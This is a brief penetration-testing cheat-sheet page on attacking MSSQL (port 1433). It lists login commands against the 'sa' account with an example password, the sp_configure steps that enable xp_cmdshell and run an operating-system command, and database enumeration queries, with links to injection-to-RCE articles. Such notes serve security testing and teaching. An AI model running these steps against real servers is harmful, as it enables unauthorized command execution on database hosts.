search

Port 1433 - MSSQL

Login:

sqsh -S $IP -U sa
mssqlclient.py -p 1435 sa:123123@$IP

Check/Enable xp_cmdshell:

sp_configure 'show advanced options', '1'
RECONFIGURE
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
xp_cmdshell cd C:/Users && dir

Get Info

  • DBs

SELECT name FROM master.dbo.sysdatabase

  • Tables

SELECT * FROM $dbname.INFORMATION_SCHEMA.TABLES;

Resources:

LogoMSSQL for Pentester: Command Execution with xp_cmdshellHacking Articleschevron-right
LogoMSSQL Practical Injection Cheat Sheet - Perspective RiskAdvania UKchevron-right
https://blooserpent.medium.com/mssql-injection-to-rce-guide-read-output-of-xp-cmdshell-b8216857c36blooserpent.medium.comchevron-right
LogoMSSQL for Pentester: Command Execution with xp_cmdshellhttps://unsafe.shchevron-right
PreviousPort 1521 - Oracle DB ListenerNextPort 2049 - NFS

Last updated